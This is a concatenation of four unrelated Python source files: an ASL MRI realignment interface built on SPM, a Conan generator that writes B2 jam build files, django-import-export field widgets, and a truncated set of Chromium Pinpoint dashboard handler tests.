        False,
        usedefault=True,
        desc='Indicate whether realignment is done to the mean image')
    correct_tagging = traits.Bool(
        True,
        usedefault=True,
        desc='True/False correct for tagging artifact by zeroing the mean'
             ' difference between control and tag.')
    # When empty, control/tag frames default to even/odd scan indices
    # (see ControlTagRealign._run_interface).
    control_scans = traits.List(
        [],
        traits.Int(),
        desc='control frames numbers')
    tag_scans = traits.List(
        [],
        traits.Int(),
        desc='tag frames numbers')
class ControlTagRealignOutputSpec(TraitedSpec):
    # Output specification for the ControlTagRealign interface.
    realigned_files = File(exists=True,
                           desc='The resliced files')
    realignment_parameters = OutputMultiPath(
        File(exists=True),
        desc='Estimated translation and rotation parameters')
class ControlTagRealign(BaseInterface):
    """Realign ASL scans. Default parameters are those of the GIN
    pipeline.
    Notes
    -----
    This is a reimplementation of the realignement method from
    myrealign_pasl_2010.m of GIN toolbox.
    Examples
    --------
    from procasl import preprocessing
    realign = preprocessing.ControlTagRealign()
    realign.inputs.in_file = 'functional.nii'
    realign.inputs.register_to_mean = False
    realign.inputs.correct_tagging = True
    out_realign = realign.run()
    print(out_realign.outputs.realigned_files,
          out_realign.outputs.realignment_parameters)
    """
    input_spec = ControlTagRealignInputSpec
    output_spec = ControlTagRealignOutputSpec
    def _run_interface(self, runtime):
        # Set the realignement options
        realign = spm.Realign()
        realign.inputs.paths = self.inputs.paths
        realign.inputs.in_files = self.inputs.in_file
        realign.inputs.register_to_mean = self.inputs.register_to_mean
        realign.inputs.quality = 0.9
        realign.inputs.fwhm = 5.
        realign.inputs.separation = 4  # TODO: understand this parameter
        realign.inputs.interp = 2
        if self.inputs.correct_tagging:
            # Estimate the realignement parameters
            realign.inputs.jobtype = 'estimate'
            realign.run()
            parameters_file = realign.aggregate_outputs().get()[
                'realignment_parameters']
            rea_parameters = np.loadtxt(parameters_file)
            # Correct for tagging: equal means for control and tag scans
            n_scans = len(rea_parameters)
            # Default convention: even scans are control, odd scans are tag.
            if self.inputs.control_scans:
                control_scans = self.inputs.control_scans
            else:
                control_scans = range(0, n_scans, 2)
            if self.inputs.tag_scans:
                tag_scans = self.inputs.tag_scans
            else:
                tag_scans = range(1, n_scans, 2)
            # Split the control/tag mean difference evenly between the two
            # groups so their motion-parameter means coincide.
            gap = np.mean(rea_parameters[control_scans], axis=0) -\
                np.mean(rea_parameters[tag_scans], axis=0)
            rea_parameters[control_scans] -= gap / 2.
            rea_parameters[tag_scans] += gap / 2.
            # Save the corrected realignement parameters
            np.savetxt(parameters_file, rea_parameters, delimiter=' ')
            # Save the corrected transforms for each frame in spm compatible
            # .mat. This .mat serves as header for spm in case of 4D files
            affine = spm_affine(self.inputs.in_file)
            rea_affines = np.zeros((4, 4, n_scans))
            for n_scan, param in enumerate(rea_parameters):
                rea_affines[..., n_scan] = params_to_affine(param).dot(affine)
            affines_file = os.path.splitext(self.inputs.in_file)[0] + '.mat'
            savemat(affines_file, dict(mat=rea_affines))
        else:
            # No tagging correction: plain SPM estimation only.
            realign.inputs.jobtype = 'estimate'
            realign.inputs.register_to_mean = self.inputs.register_to_mean
            realign.run()
        # Reslice and save the aligned volumes
        realign = spm.Realign()
        realign.inputs.paths = self.inputs.paths
        realign.inputs.in_files = self.inputs.in_file
        realign.inputs.jobtype = 'write'
        realign.run()
        return runtime
    def _list_outputs(self):
        # SPM writes 'rp_<base>.txt' (parameters) and 'r<base>.nii'
        # (resliced volumes) into the working directory.
        outputs = self._outputs().get()
        fname = self.inputs.in_file
        _, base, _ = split_filename(fname)
        outputs["realignment_parameters"] = os.path.abspath(
            'rp_' + base + '.txt')
        outputs["realigned_files"] = os.path.abspath(
            'r' + base + '.nii')
        return outputs
class GetFirstScanInputSpec(BaseInterfaceInputSpec):
    # Input specification for the GetFirstScan interface.
    in_file = File(
        exists=True,
        mandatory=True,
        copyfile=True,
        desc='The input 4D ASL image filename')
class GetFirstScanOutputSpec(TraitedSpec):
    # Output specification for the GetFirstScan interface.
    m0_file = File(
        exists=True,
        desc='The first scan image filename')
class GetFirstScan(BaseInterface):
    """Save the first scan from 4D image (M0).
    """
    input_spec = GetFirstScanInputSpec
    output_spec = GetFirstScanOutputSpec
    def _run_interface(self, runtime):
        # Save first scan
        image = nibabel.load(self.inputs.in_file)
        data = image.get_data()
        # Keep only the first frame (indexing drops the time axis -> 3D).
        data = data[..., 0]
        image = nibabel.Nifti1Image(data, image.get_affine(),
                                    image.get_header())
        _, base, _ = split_filename(self.inputs.in_file)
        out_file = os.path.abspath('m0_' + base + '.nii')
        nibabel.save(image, out_file)
        return runtime
    def _list_outputs(self):
        # Mirror the 'm0_' naming used in _run_interface.
        outputs = self._outputs().get()
        fname = self.inputs.in_file
        _, base, _ = split_filename(fname)
        outputs["m0_file"] = os.path.abspath('m0_' + base + '.nii')
        return outputs
class RemoveFirstScanInputSpec(BaseInterfaceInputSpec):
    # Input specification for the RemoveFirstScanControl interface.
    in_file = File(
        exists=True,
        mandatory=True,
        copyfile=True,
        desc='The input 4D ASL image filename')
class RemoveFirstScanOutputSpec(TraitedSpec):
    # Output specification for the RemoveFirstScanControl interface.
    tag_ctl_file = File(
        exists=True,
        desc='The tag/control sequence image filename')
class RemoveFirstScanControl(BaseInterface):
    """Save the tag/control sequence of a 4D ASL image (removes first scan).
    """
    # NOTE(review): the spec classes are named RemoveFirstScan*Spec while
    # this class is RemoveFirstScanControl -- consider aligning the names.
    input_spec = RemoveFirstScanInputSpec
    output_spec = RemoveFirstScanOutputSpec
    def _run_interface(self, runtime):
        # Remove first scan
        image = nibabel.load(self.inputs.in_file)
        data = image.get_data()
        # Drop the first frame (the M0 scan); keep the remaining 4D series.
        data = data[..., 1:]
        image = nibabel.Nifti1Image(data, image.get_affine(),
                                    image.get_header())
        _, base, _ = split_filename(self.inputs.in_file)
        out_file = os.path.abspath('tag_ctl_' + base + '.nii')
        nibabel.save(image, out_file)
        return runtime
    def _list_outputs(self):
        # Mirror the 'tag_ctl_' naming used in _run_interface.
        outputs = self._outputs().get()
        fname = self.inputs.in_file
        _, base, _ = split_filename(fname)
        outputs["tag_ctl_file"] = os.path.abspath('tag_ctl_' + base + '.nii')
        return outputs
|
|
"""
B2 Conan Generator
This is a generator for conanbuildinfo.jam files declaring all conan dependencies
as B2 project and library targets. This generates multiple tagged build info
source files, each containing a single variant as specified by the user's
conan install profile in addition to the central generic one that includes
all possible variants.
"""
from hashlib import md5
from conans.model import Generator
class B2Generator(Generator):
    """Generator producing conanbuildinfo.jam plus one variation-tagged
    conanbuildinfo-<hash>.jam that declares all conan dependencies as B2
    sub-projects and library targets (see the module docstring).
    """
    # Lazy caches for the b2_variation_key / b2_variation_id properties.
    # The variation map itself is cached in self._b2_variation on first
    # access of the b2_variation property.
    _b2_variation_key = None
    _b2_variation_id = None

    @property
    def filename(self):
        pass  # in this case, filename defined in return value of content method

    @property
    def content(self):
        """
        Generates two content files: conanbuildinfo.jam and conanbuildinfo-ID.jam which
        the former defines sub-projects for each package and loads the other files and
        the latter define variables and targets for the packages.
        """
        result = {
            'conanbuildinfo.jam': None,
            self.conanbuildinfo_variation_jam: None
        }
        # Generate the common conanbuildinfo.jam which does four things:
        # 1. Defines some common utility functions to make the rest of the code short.
        # 2. Includes the conanbuildinfo-*.jam sub-files for constant declarations.
        # 3. Defines all the package sub-projects.
        # 4. Includes the conanbuildinfo-*.jam sub-files again, this time for declaring targets.
        cbi = [self.conanbuildinfo_header_text]
        # The prefix that does 1 & 2.
        cbi += [self.conanbuildinfo_prefix_text]
        # The sub-project definitions, i.e. 3.
        for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
            cbi += self.b2_project_for_dep(dep_name, dep_cpp_info)
        # The postfix which does 4.
        cbi += [self.conanbuildinfo_postfix_text]
        # The combined text.
        result['conanbuildinfo.jam'] = "\n".join(cbi)
        # Generate the current build variation conanbuildinfo-/variation/.jam which does two things:
        # 1. Defines project constants for the corresponding conan buildinfo variables.
        # 2. Declares targets, with b2 requirements to select the variation, for each
        #    library in a package and one "libs" target for the collection of all the libraries
        #    in the package.
        cbiv = [self.conanbuildinfo_header_text]
        # The first, 1, set of variables are collective in that they have the info for all
        # of the packages combined, 1a.
        cbiv += ["# global"]
        cbiv += self.b2_constants_for_dep('conan', self.deps_build_info)
        # Now the constants for individual packages, 1b.
        for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
            cbiv += ["# %s" % (dep_name.lower())]
            cbiv += self.b2_constants_for_dep(
                dep_name, dep_cpp_info, self.deps_user_info[dep_name])
        # Second, 2, part are the targets for the packages.
        for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
            cbiv += ["# %s" % (dep_name.lower())]
            cbiv += self.b2_targets_for_dep(dep_name, dep_cpp_info)
        result[self.conanbuildinfo_variation_jam] = "\n".join(cbiv)
        return result

    def b2_project_for_dep(self, name, info):
        """
        Generates a sub-project definition to match the package. Which is used later
        to define targets for the package libs.
        """
        if info is None:
            return []
        name = name.lower()
        # Create a b2 project for the package dependency.
        return [self.conanbuildinfo_project_template.format(name=name)]

    def b2_constants_for_dep(self, name, info, user=None):
        """
        Generates a list of constant variable definitions for the information in the
        CppInfo conan data given for the package. If user variables map is also given
        those are also generated following the package variables.
        """
        if info is None:
            return []
        name = name.lower()
        # Define the info specific variables. Note that the 'usage-requirements' one
        # needs to be last as it references the others.
        # TODO: Should be cppflags -> cxxflags
        result = \
            self.b2_constant(name, 'rootpath', [info.rootpath], True) + \
            self.b2_constant(name, 'includedirs', info.include_paths, True) + \
            self.b2_constant(name, 'libdirs', info.lib_paths, True) + \
            self.b2_constant(name, 'defines', info.defines) + \
            self.b2_constant(name, 'cppflags', info.cxxflags) + \
            self.b2_constant(name, 'cflags', info.cflags) + \
            self.b2_constant(name, 'sharedlinkflags', info.sharedlinkflags) + \
            self.b2_constant(name, 'exelinkflags', info.exelinkflags) + \
            self.b2_constant(name, 'requirements', self.b2_features(self.b2_variation)) + \
            self.b2_constant(name, 'usage-requirements', [
                '<include>$(includedirs({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
                '<define>$(defines({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
                '<cflags>$(cflags({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
                '<cxxflags>$(cppflags({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
                '<link>shared:<linkflags>$(sharedlinkflags({name},{variation}))'.format(name=name, variation=self.b2_variation_id)
            ])
        if user:
            for uk, uv in user.vars.items():
                result += self.b2_constant(uk.lower() + ',' + name, 'user', [uv])
        return result

    def b2_targets_for_dep(self, name, info):
        """
        Generates individual targets for the libraries in a package and a single "libs"
        collective alias target that refers to them.
        """
        if info is None:
            return []
        name = name.lower()
        result = []
        deps = ['/%s//libs' % dep for dep in info.public_deps]
        if info.libs:
            for lib in info.libs:
                result += [self.conanbuildinfo_variation_lib_template.format(
                    name=name, lib=lib, deps=" ".join(deps), variation=self.b2_variation_id)]
            deps.extend(info.libs)
        result += [self.conanbuildinfo_variation_alias_template.format(
            name=name, libs=" ".join(deps), variation=self.b2_variation_id)]
        return result

    def b2_constant(self, name, var, val, is_paths=False):
        """
        Generates a constant definition for the given variable and value(s). If is_path
        is True the value(s) are reformatted to be acceptable to b2.
        """
        if not val:
            return []
        if is_paths:
            val = list(self.b2_path(p) for p in val)
        value = []
        for v in val:
            if v.startswith('<'):
                # Feature values (requirements) are emitted unquoted.
                value += ['    {val}'.format(val=v)]
            else:
                value += ['    "{val}"'.format(val=v)]
        return [self.conanbuildinfo_variation_constant_template.format(
            name=name, var=var, variation=self.b2_variation_id, value="\n".join(value)
        )]

    @staticmethod
    def b2_path(path):
        """
        Adjust a regular path to the form b2 can use in source code.
        """
        return path.replace('\\', '/')

    @staticmethod
    def b2_features(variations):
        """
        Generated a b2 requirements list, i.e. <name>value list, from the given 'variations' dict.
        """
        result = []
        for k, v in sorted(variations.items()):
            if v:
                result += ['<%s>%s' % (k, v)]
        return result

    @property
    def conanbuildinfo_variation_jam(self):
        return 'conanbuildinfo-%s.jam' % self.b2_variation_key

    @property
    def b2_variation_key(self):
        """
        A hashed key of the variation to use a UID for the variation.
        """
        if not self._b2_variation_key:
            self._b2_variation_key = md5(self.b2_variation_id.encode('utf-8')).hexdigest()
        return self._b2_variation_key

    @property
    def b2_variation_id(self):
        """
        A compact single comma separated list of the variation where only the values
        of the b2 variation are included in sorted by feature name order.
        """
        if not self._b2_variation_id:
            vid = []
            for k in sorted(self.b2_variation.keys()):
                if self.b2_variation[k]:
                    vid += [self.b2_variation[k]]
            self._b2_variation_id = ",".join(vid)
        return self._b2_variation_id

    @property
    def b2_variation(self):
        """
        Returns a map of b2 features & values as translated from conan settings that
        can affect the link compatibility of libraries.
        """
        # BUG FIX: the guard previously tested "_b2_variation_key" (a
        # different attribute), so the cached map was only reachable because
        # the key property happens to be computed after this one; testing
        # the attribute that is actually assigned below makes the cache
        # correct regardless of access order.
        if not getattr(self, "_b2_variation", None):
            self._b2_variation = {}
            self._b2_variation['toolset'] = self.b2_toolset
            self._b2_variation['architecture'] = {
                'x86': 'x86', 'x86_64': 'x86',
                'ppc64le': 'power', 'ppc64': 'power', 'ppc32': 'power',
                'armv5el': 'arm', 'armv5hf': 'arm',
                'armv6': 'arm', 'armv7': 'arm', 'armv7hf': 'arm', 'armv7s': 'arm', 'armv7k': 'arm',
                'armv8': 'arm', 'armv8_32': 'arm', 'armv8.3': 'arm',
                'sparc': 'sparc', 'sparcv9': 'sparc',
                'mips': 'mips1', 'mips64': 'mips64',
            }.get(self.conanfile.settings.get_safe('arch'))
            self._b2_variation['instruction-set'] = {
                'armv5el': None, 'armv5hf': None,
                'armv6': 'armv6', 'armv7': 'armv7', 'armv7hf': None, 'armv7k': None,
                'armv7s': 'armv7s', 'armv8': None, 'armv8_32': None, 'armv8.3': None, 'avr': None,
                'mips': None, 'mips64': None,
                'ppc64le': None, 'ppc64': 'powerpc64', 'ppc32': None,
                'sparc': None, 'sparcv9': 'v9',
                'x86': None, 'x86_64': None,
            }.get(self.conanfile.settings.get_safe('arch'))
            self._b2_variation['address-model'] = {
                'x86': '32', 'x86_64': '64',
                'ppc64le': '64', 'ppc64': '64', 'ppc32': '32',
                'armv5el': '32', 'armv5hf': '32',
                'armv6': '32', 'armv7': '32', 'armv7s': '32', 'armv7k': '32', 'armv7hf': '32',
                'armv8': '64', 'armv8_32': '32', 'armv8.3': "64",
                'sparc': '32', 'sparcv9': '64',
                'mips': '32', 'mips64': '64',
            }.get(self.conanfile.settings.get_safe('arch'))
            self._b2_variation['target-os'] = {
                'Windows': 'windows', 'WindowsStore': 'windows', 'WindowsCE': 'windows',
                'Linux': 'linux',
                'Macos': 'darwin',
                'Android': 'android',
                'iOS': 'darwin', 'watchOS': 'darwin', 'tvOS': 'darwin',
                'FreeBSD': 'freebsd',
                'SunOS': 'solaris',
                'Arduino': 'linux',
            }.get(self.conanfile.settings.get_safe('os'))
            self._b2_variation['variant'] = {
                'Debug': 'debug',
                'Release': 'release',
                'RelWithDebInfo': 'relwithdebinfo',
                'MinSizeRel': 'minsizerel',
            }.get(self.conanfile.settings.get_safe('build_type'))
            self._b2_variation['cxxstd'] = {
                '98': '98', 'gnu98': '98',
                '11': '11', 'gnu11': '11',
                '14': '14', 'gnu14': '14',
                '17': '17', 'gnu17': '17',
                '2a': '2a', 'gnu2a': '2a',
                '2b': '2b', 'gnu2b': '2b',
                '2c': '2c', 'gnu2c': '2c',
            }.get(self.conanfile.settings.get_safe('cppstd'))
            self._b2_variation['cxxstd:dialect'] = {
                '98': None, 'gnu98': 'gnu',
                '11': None, 'gnu11': 'gnu',
                '14': None, 'gnu14': 'gnu',
                '17': None, 'gnu17': 'gnu',
                '2a': None, 'gnu2a': 'gnu',
                '2b': None, 'gnu2b': 'gnu',
                '2c': None, 'gnu2c': 'gnu',
            }.get(self.conanfile.settings.get_safe('cppstd'))
        return self._b2_variation

    @property
    def b2_toolset(self):
        # Map the conan compiler setting to a b2 toolset-version string;
        # None when the compiler is unknown/unset.
        compiler = {
            'sun-cc': 'sun',
            'gcc': 'gcc',
            'Visual Studio': 'msvc',
            'clang': 'clang',
            'apple-clang': 'clang'
        }.get(self.conanfile.settings.get_safe('compiler'))
        if not compiler:
            return
        if compiler == 'msvc':
            # VS 2017 reports 15 but the underlying toolset version is 14.1.
            if self.conanfile.settings.compiler.version == '15':
                version = '14.1'
            else:
                version = str(self.conanfile.settings.compiler.version)+'.0'
        else:
            version = str(self.conanfile.settings.get_safe('compiler.version'))
        return compiler + '-' + version

    conanbuildinfo_header_text = """\
#|
    B2 definitions for Conan packages. This is a generated file.
    Edit the corresponding conanfile.txt instead.
|#
"""

    conanbuildinfo_prefix_text = """\
import path ;
import project ;
import modules ;
import feature ;
local base-project = [ project.current ] ;
local base-project-mod = [ $(base-project).project-module ] ;
local base-project-location = [ project.attribute $(base-project-mod) location ] ;
rule project-define ( id )
{
    id = $(id:L) ;
    local saved-project = [ modules.peek project : .base-project ] ;
    local id-location = [ path.join $(base-project-location) $(id) ] ;
    local id-mod = [ project.load $(id-location) : synthesize ] ;
    project.initialize $(id-mod) : $(id-location) ;
    project.inherit-attributes $(id-mod) : $(base-project-mod) ;
    local attributes = [ project.attributes $(id-mod) ] ;
    $(attributes).set parent-module : $(base-project-mod) : exact ;
    modules.poke $(base-project-mod) : $(id)-mod : $(id-mod) ;
    modules.poke [ CALLER_MODULE ] : $(id)-mod : $(id-mod) ;
    modules.poke project : .base-project : $(saved-project) ;
    IMPORT $(__name__)
        : constant-if call-in-project
        : $(id-mod)
        : constant-if call-in-project ;
    if [ project.is-jamroot-module $(base-project-mod) ]
    {
        use-project /$(id) : $(id) ;
    }
    return $(id-mod) ;
}
rule constant-if ( name : value * )
{
    if $(__define_constants__) && $(value)
    {
        call-in-project : constant $(name) : $(value) ;
        modules.poke $(__name__) : $(name) : [ modules.peek $(base-project-mod) : $(name) ] ;
    }
}
rule call-in-project ( project-mod ? : rule-name args * : * )
{
    project-mod ?= $(base-project-mod) ;
    project.push-current [ project.target $(project-mod) ] ;
    local result = [ modules.call-in $(project-mod) :
        $(2) : $(3) : $(4) : $(5) : $(6) : $(7) : $(8) : $(9) : $(10) :
        $(11) : $(12) : $(13) : $(14) : $(15) : $(16) : $(17) : $(18) :
        $(19) ] ;
    project.pop-current ;
    return $(result) ;
}
rule include-conanbuildinfo ( cbi )
{
    include $(cbi) ;
}
IMPORT $(__name__)
    : project-define constant-if call-in-project include-conanbuildinfo
    : $(base-project-mod)
    : project-define constant-if call-in-project include-conanbuildinfo ;
if ! ( relwithdebinfo in [ feature.values variant ] )
{
    variant relwithdebinfo : : <optimization>speed <debug-symbols>on <inlining>full <runtime-debugging>off ;
}
if ! ( minsizerel in [ feature.values variant ] )
{
    variant minsizerel : : <optimization>space <debug-symbols>off <inlining>full <runtime-debugging>off ;
}
local __conanbuildinfo__ = [ GLOB $(__file__:D) : conanbuildinfo-*.jam : downcase ] ;
{
    local __define_constants__ = yes ;
    for local __cbi__ in $(__conanbuildinfo__)
    {
        call-in-project : include-conanbuildinfo $(__cbi__) ;
    }
}
"""

    conanbuildinfo_project_template = """\
# {name}
project-define {name} ;
"""

    conanbuildinfo_postfix_text = """\
{
    local __define_targets__ = yes ;
    for local __cbi__ in $(__conanbuildinfo__)
    {
        call-in-project : include-conanbuildinfo $(__cbi__) ;
    }
}
"""

    conanbuildinfo_variation_constant_template = """\
constant-if {var}({name},{variation}) :
{value}
    ;
"""

    conanbuildinfo_variation_lib_template = """\
if $(__define_targets__) {{
    call-in-project $({name}-mod) : lib {lib}
        : {deps}
        : <name>{lib} <search>$(libdirs({name},{variation})) $(requirements({name},{variation}))
        :
        : $(usage-requirements({name},{variation})) ;
    call-in-project $({name}-mod) : explicit {lib} ; }}
"""

    conanbuildinfo_variation_alias_template = """\
if $(__define_targets__) {{
    call-in-project $({name}-mod) : alias libs
        : {libs}
        : $(requirements({name},{variation}))
        :
        : $(usage-requirements({name},{variation})) ;
    call-in-project $({name}-mod) : explicit libs ; }}
"""
|
|
from __future__ import unicode_literals
from decimal import Decimal
from datetime import datetime
from django.utils import datetime_safe
from django.utils.encoding import smart_text
from django.conf import settings
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
class Widget(object):
    """Base class converting field values between python objects and their
    import/export representations.

    A widget implements the two directions of conversion:

    * ``clean`` turns an imported raw value into the appropriate python
      representation
    * ``render`` turns an object field value into its export representation
    """
    def clean(self, value):
        """Return the python object corresponding to the import ``value``."""
        return value

    def render(self, value):
        """Return the export representation of the python ``value``."""
        return force_text(value)
class NumberWidget(Widget):
    # Base widget for numeric fields: export keeps the native numeric
    # value instead of coercing to text like the base Widget does.
    def render(self, value):
        """Return the numeric value unchanged for export."""
        return value
class IntegerWidget(NumberWidget):
    """
    Widget for converting integer fields.
    """
    def clean(self, value):
        """Return ``value`` as an int, or None for empty input.

        Empty markers (None, "", empty containers) map to None, while a
        genuine zero is still coerced with int(). The original test used
        ``value is not 0`` -- an identity comparison with an int literal
        that only works thanks to CPython's small-int caching and raises
        SyntaxWarning on modern Pythons; an equality test is the correct
        form (and also treats 0.0 / False as zero rather than as empty).
        """
        if not value and value != 0:
            return None
        return int(value)
class DecimalWidget(NumberWidget):
    """
    Widget converting decimal fields via :class:`decimal.Decimal`.
    """
    def clean(self, value):
        """Return ``value`` as a Decimal, or None for empty input."""
        if value:
            return Decimal(value)
        return None
class CharWidget(Widget):
    """
    Widget for text fields.
    """
    def render(self, value):
        """Return ``value`` coerced to a text string for export."""
        return force_text(value)
class BooleanWidget(Widget):
    """
    Widget for boolean fields, serialised as "1"/"0" with "" for None.
    """
    TRUE_VALUES = ["1", 1]
    FALSE_VALUE = "0"

    def render(self, value):
        """Export: None -> "", truthy -> "1", falsy -> "0"."""
        if value is None:
            return ""
        if value:
            return self.TRUE_VALUES[0]
        return self.FALSE_VALUE

    def clean(self, value):
        """Import: "" -> None, recognised true markers -> True, else False."""
        if value == "":
            return None
        return value in self.TRUE_VALUES
class DateWidget(Widget):
    """
    Widget for converting date fields.

    Takes an optional ``format`` parameter; when omitted, falls back to
    ``settings.DATE_INPUT_FORMATS`` or ISO "%Y-%m-%d".
    """
    def __init__(self, format=None):
        if format is None:
            if not settings.DATE_INPUT_FORMATS:
                formats = ("%Y-%m-%d",)
            else:
                formats = settings.DATE_INPUT_FORMATS
        else:
            formats = (format,)
        self.formats = formats

    def clean(self, value):
        """Parse ``value`` against each configured format in order.

        Returns None for empty input; raises ValueError when no format
        matches.
        """
        if not value:
            return None
        for format in self.formats:
            try:
                return datetime.strptime(value, format).date()
            except (ValueError, TypeError):
                continue
        raise ValueError("Enter a valid date.")

    def render(self, value):
        """Format ``value`` with the primary format ("" for empty).

        Dates before 1900 can make ``strftime`` raise ValueError on some
        Python versions, hence the ``datetime_safe`` fallback. The
        original bare ``except:`` swallowed every exception (including
        KeyboardInterrupt); it is narrowed to the ValueError the fallback
        actually handles.
        """
        if not value:
            return ""
        try:
            return value.strftime(self.formats[0])
        except ValueError:
            return datetime_safe.new_date(value).strftime(self.formats[0])
class DateTimeWidget(Widget):
    """
    Widget for converting datetime fields.

    Takes an optional ``format`` parameter; when omitted, falls back to
    ``settings.DATETIME_INPUT_FORMATS`` or "%Y-%m-%d %H:%M:%S".
    """
    def __init__(self, format=None):
        if format is not None:
            formats = (format,)
        elif settings.DATETIME_INPUT_FORMATS:
            formats = settings.DATETIME_INPUT_FORMATS
        else:
            formats = ("%Y-%m-%d %H:%M:%S",)
        self.formats = formats

    def clean(self, value):
        """Parse ``value`` against each configured format in order."""
        if not value:
            return None
        for fmt in self.formats:
            try:
                return datetime.strptime(value, fmt)
            except (ValueError, TypeError):
                continue
        raise ValueError("Enter a valid date/time.")

    def render(self, value):
        """Format ``value`` with the primary format ("" for empty)."""
        if not value:
            return ""
        return value.strftime(self.formats[0])
class ForeignKeyWidget(Widget):
    """
    Widget for ``ForeignKey`` model fields that looks up the related object.

    By default the related model is looked up by primary key (``pk``), but
    any field of the related model may be used instead. For example, rather
    than declaring ``class Meta: fields = ('author__name', ...)`` in your
    Resource, declare the field as::

        class BookResource(resources.ModelResource):
            author = fields.Field(column_name='author', attribute='author', \
                widget=ForeignKeyWidget(Author, 'name'))
            class Meta: fields = ('author', ...)

    This allows "natural keys" to be used for both import and export.

    Parameters:
        ``model`` should be the Model instance for this ForeignKey (required).
        ``field`` should be the lookup field on the related model.
    """
    def __init__(self, model, field='pk', *args, **kwargs):
        self.model = model
        self.field = field
        super(ForeignKeyWidget, self).__init__(*args, **kwargs)

    def clean(self, value):
        """Return the related instance matching ``value`` (None if empty)."""
        lookup_value = super(ForeignKeyWidget, self).clean(value)
        if not lookup_value:
            return None
        return self.model.objects.get(**{self.field: lookup_value})

    def render(self, value):
        """Return the lookup field of the related instance ("" for None)."""
        if value is None:
            return ""
        return getattr(value, self.field)
class ManyToManyWidget(Widget):
    """
    Widget for ``ManyToManyField`` model fields, representing the m2m
    relation as a separated list of values that identify the related rows.

    Requires a positional argument: the class to which the field is related.

    Optional keyword arguments:
        separator - default ","
        field - field of related model, default ``pk``
    """

    def __init__(self, model, separator=None, field=None, *args, **kwargs):
        self.model = model
        self.separator = ',' if separator is None else separator
        self.field = 'pk' if field is None else field
        super(ManyToManyWidget, self).__init__(*args, **kwargs)

    def clean(self, value):
        # Empty input maps to an empty queryset, not None.
        if not value:
            return self.model.objects.none()
        lookup = '%s__in' % self.field
        return self.model.objects.filter(
            **{lookup: value.split(self.separator)})

    def render(self, value):
        parts = (smart_text(getattr(obj, self.field)) for obj in value.all())
        return self.separator.join(parts)
|
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import itertools
import json
import mock
import webapp2
import webtest
from dashboard import pinpoint_request
from dashboard.common import namespaced_stored_object
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import anomaly_config
from dashboard.models import graph_data
from dashboard.services import pinpoint_service
# Defaults filled in by GenerateTryRequestParams() /
# GenerateBisectRequestParams() when a test omits the corresponding field.
_DEFAULT_START_COMMIT = 'abcd1234'
# NOTE(review): the name reads "COMMENT" but it holds the default *end
# commit* — presumably a typo for _DEFAULT_END_COMMIT; renaming would touch
# both helper functions, so it is only flagged here.
_DEFAULT_END_COMMENT = 'efgh5678'
_DEFAULT_TEST_ARGS = ''
_DEFAULT_BUG_ID = 1
_DEFAULT_PIN = ''
_DEFAULT_BISECT_MODE = 'performance'
def GenerateTryRequestParams(params):
  """Fill in defaults for perf-try request fields missing from |params|.

  The dict is modified in place and also returned for convenience.
  """
  for key in ('start_commit', 'end_commit', 'extra_test_args'):
    if key in params:
      continue
    params[key] = {
        'start_commit': _DEFAULT_START_COMMIT,
        'end_commit': _DEFAULT_END_COMMENT,
        'extra_test_args': _DEFAULT_TEST_ARGS,
    }[key]
  return params
def GenerateBisectRequestParams(params):
  """Fill in defaults for bisect request fields missing from |params|.

  The dict is modified in place and also returned for convenience.
  """
  for key in ('start_commit', 'end_commit', 'bisect_mode', 'pin', 'bug_id'):
    if key in params:
      continue
    params[key] = {
        'start_commit': _DEFAULT_START_COMMIT,
        'end_commit': _DEFAULT_END_COMMENT,
        'bisect_mode': _DEFAULT_BISECT_MODE,
        'pin': _DEFAULT_PIN,
        'bug_id': _DEFAULT_BUG_ID,
    }[key]
  return params
class PinpointNewPrefillRequestHandlerTest(testing_common.TestCase):
  """Tests for the /pinpoint/new/prefill request handler."""

  def setUp(self):
    super(PinpointNewPrefillRequestHandlerTest, self).setUp()
    wsgi_app = webapp2.WSGIApplication([
        (r'/pinpoint/new/prefill',
         pinpoint_request.PinpointNewPrefillRequestHandler)
    ])
    self.testapp = webtest.TestApp(wsgi_app)

  def testPost_UsesUnescapedStoryName(self):
    # The prefill response should carry the unescaped story name, not the
    # escaped test-path suffix.
    test_meta = graph_data.TestMetadata(
        id='M/B/S/foo', unescaped_story_name='foo:bar')
    test_meta.put()
    resp = self.testapp.post('/pinpoint/new/prefill',
                             {'test_path': 'M/B/S/foo'})
    self.assertEqual({'story_filter': 'foo:bar'}, json.loads(resp.body))
class PinpointNewPerfTryRequestHandlerTest(testing_common.TestCase):
  """Tests for the perf-try flavour of the /pinpoint/new handler.

  Covers both the HTTP handler and the PinpointParamsFromPerfTryParams()
  translation helper (authorization, required fields, target/benchmark
  derivation from the test path, and commit-position -> git-hash conversion).
  """

  def setUp(self):
    super(PinpointNewPerfTryRequestHandlerTest, self).setUp()
    app = webapp2.WSGIApplication([
        (r'/pinpoint/new', pinpoint_request.PinpointNewPerfTryRequestHandler)
    ])
    self.testapp = webtest.TestApp(app)
    self.SetCurrentUser('foo@chromium.org')
    # The params helper resolves repository names via this stored object.
    namespaced_stored_object.Set('repositories', {
        'chromium': {
            'some': 'params'
        },
        'v8': {
            'more': 'params'
        }
    })

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=False))
  def testPost_NotSheriff(self):
    # Non-sheriff users get an authorization error instead of a job.
    response = self.testapp.post('/pinpoint/new')
    self.assertEqual({u'error': u'User "foo@chromium.org" not authorized.'},
                     json.loads(response.body))

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPost_NoStoryFilter(self):
    # A perf-try request without a story filter is rejected.
    params = GenerateTryRequestParams(
        {'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo'})
    response = self.testapp.post('/pinpoint/new', params=params)
    self.assertEqual({u'error': u'Story is required.'},
                     json.loads(response.body))

  @mock.patch.object(utils, 'IsValidSheriffUser',
